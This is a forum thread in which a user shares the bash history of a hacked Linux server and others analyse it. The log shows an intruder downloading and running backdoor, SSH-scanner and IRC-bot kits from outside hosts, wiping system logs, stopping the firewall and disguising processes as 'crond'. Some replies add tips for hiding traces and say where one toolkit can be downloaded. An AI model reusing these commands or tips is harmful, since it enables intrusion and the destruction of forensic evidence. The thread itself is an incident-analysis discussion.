Sorry for the long post...

One of my friend's Linux server's was hacked a day ago. He passed the bash history on to me. Some will find it boring, others might find it interesting as I did. There's one interesting thing to note though; the bash history was rm'd yet it still exists??? The last few lines is my friend performing forensics.

w
cd tmp
cd /tmp
wget www.ei-gei.go.ro/bk.tar.gz
tar zxvf bk.tar.gz
rm -rf bk.tar.gz
cd bk
./install
w
cd /home
ls
cd /dev/shm
ls
wget www.ei-gei.go.ro/scan.tar
tar zxvf scan.tar
rm -rf scan.tar
cd ssh
rm -rf bios.txt uniq.txt vuln.txt
./ss 22 -a 204 -s 10
killall -9 ss
rm -rf .bash_history
rm -rf /var/run/utmp
rm -rf /var/run/wtmp -
rm -rf /var/log/lastlog
rm -rf /usr/adm/lastlog
rm -rf .bash_history
cd /var/log/
rm -rf wtmp
rm -rf secure
rm -rf lastlog
rm -rf messages
touch messagess
touch wtmp
touch secure
touch lastlog
cd /root
rm -rf .bash_history
touch .bash_history
exit
uptime
cat /etc/hosts
passwd
wget
tar
wget
cd /tmp
wget ww.ei-gei.go.ro/php.tgz
wget ww.ei-gei.go.ro/php.tgzls
ls -a
rm -rf no_user.phtml
wget www.asterix-obelix.net/php.tgz
tar -zxvf php.tgz
rm -rf php.tgz
cd ssh
./ss 22 -a 192 -s 10
./ss 22 -a 192 -s 10
cd /tmp
cd ssh
rm -rf *.txt
/ss 22 -a 192 -s 10
./ss 22 -a 192 -s 10
cd ..
cd var/log
ls
rm -rf lastlog
uptime
ps -ax
kil -9 1652 1653
kill -9 1652 1653
ps -ax
cd ..
cd lib
ls
mkdir .isso
c .isso
cd .isso
ls
cat /proc/cpuinfo
cat /etc/hosts
cat /etc/issue
cat /etc/issue
ls
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
ls -a
rm -rf mech.tgz .a
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
ls
rm -rf mech.tgz .a
ls
ls -a
cd/tmp
cd /vat/lib/.isso
cd ...
cd ..
cd var/lib
cd .isso
wget www.asterix-obelix.net/mech.tgz
cd ..
cd var/log
ls -a
cd /tmp/ssh
ls
./ss 22 -a 192 -s 10
./ss 22 -a 192 -s 10
cd ..
cd var/lib
cd .isso
ls
tar -zxvf mech.tgz
cd .a
ls
mv mech crond
export PATH="."
crond
crond
crond
cd ..
cd lib
ls -a
ps -ax
kill -9 9525 9526 9527 9528 9529 9530 9531
ps -ax
mkdir .isso
cd .isso
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
rm -rf mech.tgz
cd .a
ls
mv mech crond
export PATH="."
crond
crond
service iptables start
cat /etc/hosts
ls
service iptables stop
cd ..
ps -ax
kill -9 5890
cd var/lib/isso
ls
ls -a
cd .a
ls
service iptables stop
export PATH="."
crond
ls
ps -ax
service iptables start
service iptables start
service iptables start
service iptables stop
service iptables start
cd ..
cd var/log
ls -a
cd ..
cd lib/isso
ls
ls -a
cd .a
ps -ax
cd ..
rm -rf .a
wget www.musketari.com/psybnc.tgz
tar -zxvf psybnc.tgz
rm -rf psybnc.tgz
cd psybnc
ls
mv psybnc crond
ls
service iptables
service iptables stop
export PATH="."
crond
cat /etc/hosts
vhost
ls
ps -ax
kill -9 6430
ls
cd flood
ls
./pingflood
cd ..
ls
cd scripts
ls
cd ..
cd ..
cd var/lib/isso
l
sls
ls
rm -rf psybnc
wget www.musketari.com/psybnc.tgz
tar -zxvf psybnc.tgz
rm -rf psybnc.tgz
cd psybnc
ls
mv psybnc crond
service iptables stop
export PATH="."
crond
cd ..
cd var/lib
ls
cd /lib
rm -rf .isso
cd /var/lib
ls -a
rm -rf .isso
cat /etc/issue
cat /etc/hosts
vhost
ls
ps -ax
kill -9 1900
mkdir isso
cd isso
wget www.musketari.com/psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc.tgz
cd psybnc
ls
mv psybnc crond
ls
export PATH="."
crond
ps -ax
service iptables stop
ls
cd ..
cd var/log/isso
ccd var/lib/isso
cd var/lib/isso
ls
ps -ax
rm -rf 5890
ls
rm -rf psybnc psybnc.tgz
wget www.asterix-obelix.net/mech/tgz
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
mr -rf mech.tgz
rm -rf .a
tar -zxvf mech.tgz
rm -rf mech.tgz
cd .a
ls
mv mech crond
export PATH="."
crond
cd ..
service iptables stop
cd ..
cd var/lib/isso
cd psybnc
ls
export PATH="."
crond
cat /etc/hosts
mysql intranet
mysql intranet_users
telnet localhost 143
telnet localhost 143
mysql intranet_users
mysql intranet_users
su admin
whois
whois -p
whois -v
users
ls
cd ..
ls
usr
cd usr/
ls
cd bin/
ls
cd ..
ls
cd man
ls
cd ..
cd local/
ls
exit
telnet localhost 143
a9 LOGIN admin MaGibd4A
telnet localhost 143
telnet localhost 143
ifconfig
route -n
cd /opt/applications/
ls
cd intranet
ls
cd main
wget http://www.realvnc.com/dist/vnc-4.0-x86_win32.exe
mv vnc-4.0-x86_win32.exe vnc.exe
vi a.html
rm a.html
exit
mc
cat .bash_history
lesst .bash_history
less .bash_history
mc
df -h
dmesg
ifconfig
netstat

How was the box compromised?!?!? root password password

if the box was fully patched, I think it was compromised using SSH Bruteforcer or and include/sql injection vulnerability.

the kiddy installed an IRC bot (EnergyMech) and a backdoor.

can you upload theses files here on the forum :
www.ei-gei.go.ro/bk.tar.gz
www.ei-gei.go.ro/scan.tar
www.ei-gei.go.ro/php.tgz

the server seems to be down.

hrm, it looks like an auto hacker script, coz the kiddy download a windows version of vnc!

You might want to read my analysis at:
http://www.security.org.sg/gtec/honeynet/v...?diary=20041105

The techniques used are similar.

as for vnc.exe, the attacker probably used his newly 0wn3d box as a repository
for his/her next attack attempts.

All three should refer to the same thing as what you mentioned (i.e. brutessh variant).

It is a very interessant post, it seems obvious that a backdoor is installed, but what i the utility of the scan.tar program and the command ./ss 22 -a 192 -s 10 ?
What is the purpose of this ?

Thank !

Can anyone believe that the brutessh2.c author took the time to hardcode 2000 calls to

checkauth("root", "somepasswordhere", buff);

And he says *feel free to add more passwords and more users:=)

wouldn't it be more effective to have the program read in usernames and passwords to try from a file in the command line arguments?

Even here our kiddie demonstrates knowledge of how to use command line arguments in his ./ssh command so I don't think that would have gone over his head.

Also, our kiddie does not seem to understand that bash shell writes commands from the current shell session to $HOME/.bash_history when the user logs out. It doesn't matter that he obilterated the .bash_history, his current session will be appended to it once he exits his shell.

He needs to add
rm .bash_history
to his $HOME/.bash_logout
file.... so it will be run once the shell is closed, or better yet.......
just fill the file up with inconspicuous commands like, ls, mv, cp, pine, elm, ps
so it looks like nothing weird has happened.

-nc-

the php.tgz you can download from www.asterix-obelix.net/php.tgz

and the ./ss 22 -a 192 -s 10 id from php.tgz download and you will see

Quite surprised that no one seems to bother to read my analysis (see link
above) which I gave a walkthrough of how the tools are used. Perhaps someone
else can share with us some analysis done on other recent compromises.

Yes, sorry amnesia , i have reading your analysis. Very interessant, thanx a lot !

intresting little read/topic thnx

Romanian ./script kiddies strike again.

Well done, I wasn't sure if any would pick up that it was a Romanian script kiddie. According to my friend he was actually connecting from a Romanian IP as well. He port scanned him back but he was gone!

Unfortunately I don’t' have those individual files for Gurou. The box was wiped before pulling them off. If you check that site it should be back up anyway.

As for a forensic analysis of what actually happened I don't have it. My friend hasn't given me an update on what he found yet. I can tell you though that the box was hacked within three days of being put online.

Heh, only a quick look at the history is enough to understand that this is a typical romanian 1337 k1dd13. Have seen so many like this...bored. Like one my friend said



Well, that`s all folks, have a nice day!

^^ ./ss 22(SSH PORT) -a 192(RANGE TO SCAN 192.x.x.x) -s(threats maybe donno )

greetz crackie